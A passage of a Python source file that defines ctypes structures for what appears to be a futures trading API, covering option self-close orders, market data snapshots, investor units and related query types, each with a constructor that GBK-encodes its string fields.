("OptionSelfCloseRef", c_char_Array_13),
("UserID", c_char_Array_16),
("Volume", c_int),
("RequestID", c_int),
("BusinessUnit", c_char_Array_21),
("HedgeFlag", c_char),
("OptSelfCloseFlag", c_char),
("OptionSelfCloseLocalID", c_char_Array_13),
("ExchangeID", c_char_Array_9),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("ExchangeInstID", c_char_Array_31),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("OrderSubmitStatus", c_char),
("NotifySequence", c_int),
("TradingDay", c_char_Array_9),
("SettlementID", c_int),
("OptionSelfCloseSysID", c_char_Array_21),
("InsertDate", c_char_Array_9),
("InsertTime", c_char_Array_9),
("CancelTime", c_char_Array_9),
("ExecResult", c_char),
("ClearingPartID", c_char_Array_11),
("SequenceNo", c_int),
("FrontID", c_int),
("SessionID", c_int),
("UserProductInfo", c_char_Array_11),
("StatusMsg", c_char_Array_81),
("ActiveUserID", c_char_Array_16),
("BrokerOptionSelfCloseSeq", c_int),
("BranchID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
("AccountID", c_char_Array_13),
("CurrencyID", c_char_Array_4),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, OptionSelfCloseRef=None, UserID=None, Volume=None, RequestID=None, BusinessUnit=None, HedgeFlag=None, OptSelfCloseFlag=None, OptionSelfCloseLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, OrderSubmitStatus=None, NotifySequence=None, TradingDay=None, SettlementID=None, OptionSelfCloseSysID=None, InsertDate=None, InsertTime=None, CancelTime=None, ExecResult=None, ClearingPartID=None, SequenceNo=None, FrontID=None, SessionID=None, UserProductInfo=None, StatusMsg=None, ActiveUserID=None, BrokerOptionSelfCloseSeq=None, BranchID=None, InvestUnitID=None, AccountID=None, CurrencyID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if OptionSelfCloseRef:
self.OptionSelfCloseRef = OptionSelfCloseRef.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if Volume:
self.Volume = Volume
if RequestID:
self.RequestID = RequestID
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if OptSelfCloseFlag:
self.OptSelfCloseFlag = OptSelfCloseFlag.encode("GBK")
if OptionSelfCloseLocalID:
self.OptionSelfCloseLocalID = OptionSelfCloseLocalID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if OrderSubmitStatus:
self.OrderSubmitStatus = OrderSubmitStatus.encode("GBK")
if NotifySequence:
self.NotifySequence = NotifySequence
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
if OptionSelfCloseSysID:
self.OptionSelfCloseSysID = OptionSelfCloseSysID.encode("GBK")
if InsertDate:
self.InsertDate = InsertDate.encode("GBK")
if InsertTime:
self.InsertTime = InsertTime.encode("GBK")
if CancelTime:
self.CancelTime = CancelTime.encode("GBK")
if ExecResult:
self.ExecResult = ExecResult.encode("GBK")
if ClearingPartID:
self.ClearingPartID = ClearingPartID.encode("GBK")
if SequenceNo:
self.SequenceNo = SequenceNo
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if UserProductInfo:
self.UserProductInfo = UserProductInfo.encode("GBK")
if StatusMsg:
self.StatusMsg = StatusMsg.encode("GBK")
if ActiveUserID:
self.ActiveUserID = ActiveUserID.encode("GBK")
if BrokerOptionSelfCloseSeq:
self.BrokerOptionSelfCloseSeq = BrokerOptionSelfCloseSeq
if BranchID:
self.BranchID = BranchID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class OptionSelfCloseAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("OptionSelfCloseActionRef", c_int),
("OptionSelfCloseRef", c_char_Array_13),
("RequestID", c_int),
("FrontID", c_int),
("SessionID", c_int),
("ExchangeID", c_char_Array_9),
("OptionSelfCloseSysID", c_char_Array_21),
("ActionFlag", c_char),
("ActionDate", c_char_Array_9),
("ActionTime", c_char_Array_9),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("OptionSelfCloseLocalID", c_char_Array_13),
("ActionLocalID", c_char_Array_13),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("BusinessUnit", c_char_Array_21),
("OrderActionStatus", c_char),
("UserID", c_char_Array_16),
("StatusMsg", c_char_Array_81),
("InstrumentID", c_char_Array_31),
("BranchID", c_char_Array_9),
("InvestUnitID", c_char_Array_17),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, BrokerID=None, InvestorID=None, OptionSelfCloseActionRef=None, OptionSelfCloseRef=None, RequestID=None, FrontID=None, SessionID=None, ExchangeID=None, OptionSelfCloseSysID=None, ActionFlag=None, ActionDate=None, ActionTime=None, TraderID=None, InstallID=None, OptionSelfCloseLocalID=None, ActionLocalID=None, ParticipantID=None, ClientID=None, BusinessUnit=None, OrderActionStatus=None, UserID=None, StatusMsg=None, InstrumentID=None, BranchID=None, InvestUnitID=None, IPAddress=None, MacAddress=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if OptionSelfCloseActionRef:
self.OptionSelfCloseActionRef = OptionSelfCloseActionRef
if OptionSelfCloseRef:
self.OptionSelfCloseRef = OptionSelfCloseRef.encode("GBK")
if RequestID:
self.RequestID = RequestID
if FrontID:
self.FrontID = FrontID
if SessionID:
self.SessionID = SessionID
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if OptionSelfCloseSysID:
self.OptionSelfCloseSysID = OptionSelfCloseSysID.encode("GBK")
if ActionFlag:
self.ActionFlag = ActionFlag.encode("GBK")
if ActionDate:
self.ActionDate = ActionDate.encode("GBK")
if ActionTime:
self.ActionTime = ActionTime.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if OptionSelfCloseLocalID:
self.OptionSelfCloseLocalID = OptionSelfCloseLocalID.encode("GBK")
if ActionLocalID:
self.ActionLocalID = ActionLocalID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if OrderActionStatus:
self.OrderActionStatus = OrderActionStatus.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if StatusMsg:
self.StatusMsg = StatusMsg.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if BranchID:
self.BranchID = BranchID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class QryOptionSelfClose(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("OptionSelfCloseSysID", c_char_Array_21),
("InsertTimeStart", c_char_Array_9),
("InsertTimeEnd", c_char_Array_9),
]
def __init__(self, BrokerID=None, InvestorID=None, InstrumentID=None, ExchangeID=None, OptionSelfCloseSysID=None, InsertTimeStart=None, InsertTimeEnd=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if OptionSelfCloseSysID:
self.OptionSelfCloseSysID = OptionSelfCloseSysID.encode("GBK")
if InsertTimeStart:
self.InsertTimeStart = InsertTimeStart.encode("GBK")
if InsertTimeEnd:
self.InsertTimeEnd = InsertTimeEnd.encode("GBK")
class ExchangeOptionSelfClose(Struct):
_fields_ = [
("Volume", c_int),
("RequestID", c_int),
("BusinessUnit", c_char_Array_21),
("HedgeFlag", c_char),
("OptSelfCloseFlag", c_char),
("OptionSelfCloseLocalID", c_char_Array_13),
("ExchangeID", c_char_Array_9),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("ExchangeInstID", c_char_Array_31),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("OrderSubmitStatus", c_char),
("NotifySequence", c_int),
("TradingDay", c_char_Array_9),
("SettlementID", c_int),
("OptionSelfCloseSysID", c_char_Array_21),
("InsertDate", c_char_Array_9),
("InsertTime", c_char_Array_9),
("CancelTime", c_char_Array_9),
("ExecResult", c_char),
("ClearingPartID", c_char_Array_11),
("SequenceNo", c_int),
("BranchID", c_char_Array_9),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
]
def __init__(self, Volume=None, RequestID=None, BusinessUnit=None, HedgeFlag=None, OptSelfCloseFlag=None, OptionSelfCloseLocalID=None, ExchangeID=None, ParticipantID=None, ClientID=None, ExchangeInstID=None, TraderID=None, InstallID=None, OrderSubmitStatus=None, NotifySequence=None, TradingDay=None, SettlementID=None, OptionSelfCloseSysID=None, InsertDate=None, InsertTime=None, CancelTime=None, ExecResult=None, ClearingPartID=None, SequenceNo=None, BranchID=None, IPAddress=None, MacAddress=None):
super().__init__()
if Volume:
self.Volume = Volume
if RequestID:
self.RequestID = RequestID
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if HedgeFlag:
self.HedgeFlag = HedgeFlag.encode("GBK")
if OptSelfCloseFlag:
self.OptSelfCloseFlag = OptSelfCloseFlag.encode("GBK")
if OptionSelfCloseLocalID:
self.OptionSelfCloseLocalID = OptionSelfCloseLocalID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if OrderSubmitStatus:
self.OrderSubmitStatus = OrderSubmitStatus.encode("GBK")
if NotifySequence:
self.NotifySequence = NotifySequence
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if SettlementID:
self.SettlementID = SettlementID
if OptionSelfCloseSysID:
self.OptionSelfCloseSysID = OptionSelfCloseSysID.encode("GBK")
if InsertDate:
self.InsertDate = InsertDate.encode("GBK")
if InsertTime:
self.InsertTime = InsertTime.encode("GBK")
if CancelTime:
self.CancelTime = CancelTime.encode("GBK")
if ExecResult:
self.ExecResult = ExecResult.encode("GBK")
if ClearingPartID:
self.ClearingPartID = ClearingPartID.encode("GBK")
if SequenceNo:
self.SequenceNo = SequenceNo
if BranchID:
self.BranchID = BranchID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
class QryOptionSelfCloseAction(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("ExchangeID", c_char_Array_9),
]
def __init__(self, BrokerID=None, InvestorID=None, ExchangeID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
class ExchangeOptionSelfCloseAction(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
("OptionSelfCloseSysID", c_char_Array_21),
("ActionFlag", c_char),
("ActionDate", c_char_Array_9),
("ActionTime", c_char_Array_9),
("TraderID", c_char_Array_21),
("InstallID", c_int),
("OptionSelfCloseLocalID", c_char_Array_13),
("ActionLocalID", c_char_Array_13),
("ParticipantID", c_char_Array_11),
("ClientID", c_char_Array_11),
("BusinessUnit", c_char_Array_21),
("OrderActionStatus", c_char),
("UserID", c_char_Array_16),
("BranchID", c_char_Array_9),
("IPAddress", c_char_Array_16),
("MacAddress", c_char_Array_21),
("ExchangeInstID", c_char_Array_31),
("OptSelfCloseFlag", c_char),
]
def __init__(self, ExchangeID=None, OptionSelfCloseSysID=None, ActionFlag=None, ActionDate=None, ActionTime=None, TraderID=None, InstallID=None, OptionSelfCloseLocalID=None, ActionLocalID=None, ParticipantID=None, ClientID=None, BusinessUnit=None, OrderActionStatus=None, UserID=None, BranchID=None, IPAddress=None, MacAddress=None, ExchangeInstID=None, OptSelfCloseFlag=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if OptionSelfCloseSysID:
self.OptionSelfCloseSysID = OptionSelfCloseSysID.encode("GBK")
if ActionFlag:
self.ActionFlag = ActionFlag.encode("GBK")
if ActionDate:
self.ActionDate = ActionDate.encode("GBK")
if ActionTime:
self.ActionTime = ActionTime.encode("GBK")
if TraderID:
self.TraderID = TraderID.encode("GBK")
if InstallID:
self.InstallID = InstallID
if OptionSelfCloseLocalID:
self.OptionSelfCloseLocalID = OptionSelfCloseLocalID.encode("GBK")
if ActionLocalID:
self.ActionLocalID = ActionLocalID.encode("GBK")
if ParticipantID:
self.ParticipantID = ParticipantID.encode("GBK")
if ClientID:
self.ClientID = ClientID.encode("GBK")
if BusinessUnit:
self.BusinessUnit = BusinessUnit.encode("GBK")
if OrderActionStatus:
self.OrderActionStatus = OrderActionStatus.encode("GBK")
if UserID:
self.UserID = UserID.encode("GBK")
if BranchID:
self.BranchID = BranchID.encode("GBK")
if IPAddress:
self.IPAddress = IPAddress.encode("GBK")
if MacAddress:
self.MacAddress = MacAddress.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if OptSelfCloseFlag:
self.OptSelfCloseFlag = OptSelfCloseFlag.encode("GBK")
class SyncDelaySwap(Struct):
_fields_ = [
("DelaySwapSeqNo", c_char_Array_15),
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("FromCurrencyID", c_char_Array_4),
("FromAmount", c_double),
("FromFrozenSwap", c_double),
("FromRemainSwap", c_double),
("ToCurrencyID", c_char_Array_4),
("ToAmount", c_double),
]
def __init__(self, DelaySwapSeqNo=None, BrokerID=None, InvestorID=None, FromCurrencyID=None, FromAmount=None, FromFrozenSwap=None, FromRemainSwap=None, ToCurrencyID=None, ToAmount=None):
super().__init__()
if DelaySwapSeqNo:
self.DelaySwapSeqNo = DelaySwapSeqNo.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if FromCurrencyID:
self.FromCurrencyID = FromCurrencyID.encode("GBK")
if FromAmount:
self.FromAmount = FromAmount
if FromFrozenSwap:
self.FromFrozenSwap = FromFrozenSwap
if FromRemainSwap:
self.FromRemainSwap = FromRemainSwap
if ToCurrencyID:
self.ToCurrencyID = ToCurrencyID.encode("GBK")
if ToAmount:
self.ToAmount = ToAmount
class QrySyncDelaySwap(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("DelaySwapSeqNo", c_char_Array_15),
]
def __init__(self, BrokerID=None, DelaySwapSeqNo=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if DelaySwapSeqNo:
self.DelaySwapSeqNo = DelaySwapSeqNo.encode("GBK")
class InvestUnit(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InvestUnitID", c_char_Array_17),
("InvestorUnitName", c_char_Array_81),
("InvestorGroupID", c_char_Array_13),
("CommModelID", c_char_Array_13),
("MarginModelID", c_char_Array_13),
("AccountID", c_char_Array_13),
("CurrencyID", c_char_Array_4),
]
def __init__(self, BrokerID=None, InvestorID=None, InvestUnitID=None, InvestorUnitName=None, InvestorGroupID=None, CommModelID=None, MarginModelID=None, AccountID=None, CurrencyID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
if InvestorUnitName:
self.InvestorUnitName = InvestorUnitName.encode("GBK")
if InvestorGroupID:
self.InvestorGroupID = InvestorGroupID.encode("GBK")
if CommModelID:
self.CommModelID = CommModelID.encode("GBK")
if MarginModelID:
self.MarginModelID = MarginModelID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
class QryInvestUnit(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("InvestUnitID", c_char_Array_17),
]
def __init__(self, BrokerID=None, InvestorID=None, InvestUnitID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if InvestUnitID:
self.InvestUnitID = InvestUnitID.encode("GBK")
class SecAgentCheckMode(Struct):
_fields_ = [
("InvestorID", c_char_Array_13),
("BrokerID", c_char_Array_11),
("CurrencyID", c_char_Array_4),
("BrokerSecAgentID", c_char_Array_13),
("CheckSelfAccount", c_int),
]
def __init__(self, InvestorID=None, BrokerID=None, CurrencyID=None, BrokerSecAgentID=None, CheckSelfAccount=None):
super().__init__()
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
if BrokerSecAgentID:
self.BrokerSecAgentID = BrokerSecAgentID.encode("GBK")
if CheckSelfAccount:
self.CheckSelfAccount = CheckSelfAccount
class SecAgentTradeInfo(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("BrokerSecAgentID", c_char_Array_13),
("InvestorID", c_char_Array_13),
("LongCustomerName", c_char_Array_161),
]
def __init__(self, BrokerID=None, BrokerSecAgentID=None, InvestorID=None, LongCustomerName=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if BrokerSecAgentID:
self.BrokerSecAgentID = BrokerSecAgentID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if LongCustomerName:
self.LongCustomerName = LongCustomerName.encode("GBK")
class MarketData(Struct):
_fields_ = [
("TradingDay", c_char_Array_9),
("InstrumentID", c_char_Array_31),
("ExchangeID", c_char_Array_9),
("ExchangeInstID", c_char_Array_31),
("LastPrice", c_double),
("PreSettlementPrice", c_double),
("PreClosePrice", c_double),
("PreOpenInterest", c_double),
("OpenPrice", c_double),
("HighestPrice", c_double),
("LowestPrice", c_double),
("Volume", c_int),
("Turnover", c_double),
("OpenInterest", c_double),
("ClosePrice", c_double),
("SettlementPrice", c_double),
("UpperLimitPrice", c_double),
("LowerLimitPrice", c_double),
("PreDelta", c_double),
("CurrDelta", c_double),
("UpdateTime", c_char_Array_9),
("UpdateMillisec", c_int),
("ActionDay", c_char_Array_9),
]
def __init__(self, TradingDay=None, InstrumentID=None, ExchangeID=None, ExchangeInstID=None, LastPrice=None, PreSettlementPrice=None, PreClosePrice=None, PreOpenInterest=None, OpenPrice=None, HighestPrice=None, LowestPrice=None, Volume=None, Turnover=None, OpenInterest=None, ClosePrice=None, SettlementPrice=None, UpperLimitPrice=None, LowerLimitPrice=None, PreDelta=None, CurrDelta=None, UpdateTime=None, UpdateMillisec=None, ActionDay=None):
super().__init__()
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if LastPrice:
self.LastPrice = LastPrice
if PreSettlementPrice:
self.PreSettlementPrice = PreSettlementPrice
if PreClosePrice:
self.PreClosePrice = PreClosePrice
if PreOpenInterest:
self.PreOpenInterest = PreOpenInterest
if OpenPrice:
self.OpenPrice = OpenPrice
if HighestPrice:
self.HighestPrice = HighestPrice
if LowestPrice:
self.LowestPrice = LowestPrice
if Volume:
self.Volume = Volume
if Turnover:
self.Turnover = Turnover
if OpenInterest:
self.OpenInterest = OpenInterest
if ClosePrice:
self.ClosePrice = ClosePrice
if SettlementPrice:
self.SettlementPrice = SettlementPrice
if UpperLimitPrice:
self.UpperLimitPrice = UpperLimitPrice
if LowerLimitPrice:
self.LowerLimitPrice = LowerLimitPrice
if PreDelta:
self.PreDelta = PreDelta
if CurrDelta:
self.CurrDelta = CurrDelta
if UpdateTime:
self.UpdateTime = UpdateTime.encode("GBK")
if UpdateMillisec:
self.UpdateMillisec = UpdateMillisec
if ActionDay:
self.ActionDay = ActionDay.encode("GBK")
class MarketDataBase(Struct):
_fields_ = [
("TradingDay", c_char_Array_9),
("PreSettlementPrice", c_double),
("PreClosePrice", c_double),
("PreOpenInterest", c_double),
("PreDelta", c_double),
]
def __init__(self, TradingDay=None, PreSettlementPrice=None, PreClosePrice=None, PreOpenInterest=None, PreDelta=None):
super().__init__()
if TradingDay:
self.TradingDay = TradingDay.encode("GBK")
if PreSettlementPrice:
self.PreSettlementPrice = PreSettlementPrice
if PreClosePrice:
self.PreClosePrice = PreClosePrice
if PreOpenInterest:
self.PreOpenInterest = PreOpenInterest
if PreDelta:
self.PreDelta = PreDelta
class MarketDataStatic(Struct):
_fields_ = [
("OpenPrice", c_double),
("HighestPrice", c_double),
("LowestPrice", c_double),
("ClosePrice", c_double),
("UpperLimitPrice", c_double),
("LowerLimitPrice", c_double),
("SettlementPrice", c_double),
("CurrDelta", c_double),
]
def __init__(self, OpenPrice=None, HighestPrice=None, LowestPrice=None, ClosePrice=None, UpperLimitPrice=None, LowerLimitPrice=None, SettlementPrice=None, CurrDelta=None):
super().__init__()
if OpenPrice:
self.OpenPrice = OpenPrice
if HighestPrice:
self.HighestPrice = HighestPrice
if LowestPrice:
self.LowestPrice = LowestPrice
if ClosePrice:
self.ClosePrice = ClosePrice
if UpperLimitPrice:
self.UpperLimitPrice = UpperLimitPrice
if LowerLimitPrice:
self.LowerLimitPrice = LowerLimitPrice
if SettlementPrice:
self.SettlementPrice = SettlementPrice
if CurrDelta:
self.CurrDelta = CurrDelta
class MarketDataLastMatch(Struct):
_fields_ = [
("LastPrice", c_double),
("Volume", c_int),
("Turnover", c_double),
("OpenInterest", c_double),
]
def __init__(self, LastPrice=None, Volume=None, Turnover=None, OpenInterest=None):
super().__init__()
if LastPrice:
self.LastPrice = LastPrice
if Volume:
self.Volume = Volume
if Turnover:
self.Turnover = Turnover
if OpenInterest:
self.OpenInterest = OpenInterest
class MarketDataBestPrice(Struct):
_fields_ = [
("BidPrice1", c_double),
("BidVolume1", c_int),
("AskPrice1", c_double),
("AskVolume1", c_int),
]
def __init__(self, BidPrice1=None, BidVolume1=None, AskPrice1=None, AskVolume1=None):
super().__init__()
if BidPrice1:
self.BidPrice1 = BidPrice1
if BidVolume1:
self.BidVolume1 = BidVolume1
if AskPrice1:
self.AskPrice1 = AskPrice1
if AskVolume1:
self.AskVolume1 = AskVolume1
class MarketDataBid23(Struct):
_fields_ = [
("BidPrice2", c_double),
("BidVolume2", c_int),
("BidPrice3", c_double),
("BidVolume3", c_int),
]
def __init__(self, BidPrice2=None, BidVolume2=None, BidPrice3=None, BidVolume3=None):
super().__init__()
if BidPrice2:
self.BidPrice2 = BidPrice2
if BidVolume2:
self.BidVolume2 = BidVolume2
if BidPrice3:
self.BidPrice3 = BidPrice3
if BidVolume3:
self.BidVolume3 = BidVolume3
class MarketDataAsk23(Struct):
_fields_ = [
("AskPrice2", c_double),
("AskVolume2", c_int),
("AskPrice3", c_double),
("AskVolume3", c_int),
]
def __init__(self, AskPrice2=None, AskVolume2=None, AskPrice3=None, AskVolume3=None):
super().__init__()
if AskPrice2:
self.AskPrice2 = AskPrice2
if AskVolume2:
self.AskVolume2 = AskVolume2
if AskPrice3:
self.AskPrice3 = AskPrice3
if AskVolume3:
self.AskVolume3 = AskVolume3
class MarketDataBid45(Struct):
_fields_ = [
("BidPrice4", c_double),
("BidVolume4", c_int),
("BidPrice5", c_double),
("BidVolume5", c_int),
]
def __init__(self, BidPrice4=None, BidVolume4=None, BidPrice5=None, BidVolume5=None):
super().__init__()
if BidPrice4:
self.BidPrice4 = BidPrice4
if BidVolume4:
self.BidVolume4 = BidVolume4
if BidPrice5:
self.BidPrice5 = BidPrice5
if BidVolume5:
self.BidVolume5 = BidVolume5
class MarketDataAsk45(Struct):
_fields_ = [
("AskPrice4", c_double),
("AskVolume4", c_int),
("AskPrice5", c_double),
("AskVolume5", c_int),
]
def __init__(self, AskPrice4=None, AskVolume4=None, AskPrice5=None, AskVolume5=None):
super().__init__()
if AskPrice4:
self.AskPrice4 = AskPrice4
if AskVolume4:
self.AskVolume4 = AskVolume4
if AskPrice5:
self.AskPrice5 = AskPrice5
if AskVolume5:
self.AskVolume5 = AskVolume5
class MarketDataUpdateTime(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
("UpdateTime", c_char_Array_9),
("UpdateMillisec", c_int),
("ActionDay", c_char_Array_9),
]
def __init__(self, InstrumentID=None, UpdateTime=None, UpdateMillisec=None, ActionDay=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if UpdateTime:
self.UpdateTime = UpdateTime.encode("GBK")
if UpdateMillisec:
self.UpdateMillisec = UpdateMillisec
if ActionDay:
self.ActionDay = ActionDay.encode("GBK")
class MarketDataExchange(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
]
def __init__(self, ExchangeID=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
class SpecificInstrument(Struct):
_fields_ = [
("InstrumentID", c_char_Array_31),
]
def __init__(self, InstrumentID=None):
super().__init__()
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
class InstrumentStatus(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
("ExchangeInstID", c_char_Array_31),
("SettlementGroupID", c_char_Array_9),
("InstrumentID", c_char_Array_31),
("InstrumentStatus", c_char),
("TradingSegmentSN", c_int),
("EnterTime", c_char_Array_9),
("EnterReason", c_char),
]
def __init__(self, ExchangeID=None, ExchangeInstID=None, SettlementGroupID=None, InstrumentID=None, InstrumentStatus=None, TradingSegmentSN=None, EnterTime=None, EnterReason=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
if SettlementGroupID:
self.SettlementGroupID = SettlementGroupID.encode("GBK")
if InstrumentID:
self.InstrumentID = InstrumentID.encode("GBK")
if InstrumentStatus:
self.InstrumentStatus = InstrumentStatus.encode("GBK")
if TradingSegmentSN:
self.TradingSegmentSN = TradingSegmentSN
if EnterTime:
self.EnterTime = EnterTime.encode("GBK")
if EnterReason:
self.EnterReason = EnterReason.encode("GBK")
class QryInstrumentStatus(Struct):
_fields_ = [
("ExchangeID", c_char_Array_9),
("ExchangeInstID", c_char_Array_31),
]
def __init__(self, ExchangeID=None, ExchangeInstID=None):
super().__init__()
if ExchangeID:
self.ExchangeID = ExchangeID.encode("GBK")
if ExchangeInstID:
self.ExchangeInstID = ExchangeInstID.encode("GBK")
class InvestorAccount(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorID", c_char_Array_13),
("AccountID", c_char_Array_13),
("CurrencyID", c_char_Array_4),
]
def __init__(self, BrokerID=None, InvestorID=None, AccountID=None, CurrencyID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
class PositionProfitAlgorithm(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("AccountID", c_char_Array_13),
("Algorithm", c_char),
("Memo", c_char_Array_161),
("CurrencyID", c_char_Array_4),
]
def __init__(self, BrokerID=None, AccountID=None, Algorithm=None, Memo=None, CurrencyID=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if AccountID:
self.AccountID = AccountID.encode("GBK")
if Algorithm:
self.Algorithm = Algorithm.encode("GBK")
if Memo:
self.Memo = Memo.encode("GBK")
if CurrencyID:
self.CurrencyID = CurrencyID.encode("GBK")
class Discount(Struct):
_fields_ = [
("BrokerID", c_char_Array_11),
("InvestorRange", c_char),
("InvestorID", c_char_Array_13),
("Discount", c_double),
]
def __init__(self, BrokerID=None, InvestorRange=None, InvestorID=None, Discount=None):
super().__init__()
if BrokerID:
self.BrokerID = BrokerID.encode("GBK")
if InvestorRange:
self.InvestorRange = InvestorRange.encode("GBK")
if InvestorID:
self.InvestorID = InvestorID.encode("GBK")
if Discount:
self.Discount = Discount
class QryTransferBank(Struct):
_fields_ = [
("BankID", c_char_Array_4),
("BankBrchID", c_char_Array_5),
]
def __init__(self, BankID=None, BankBrchID=None):
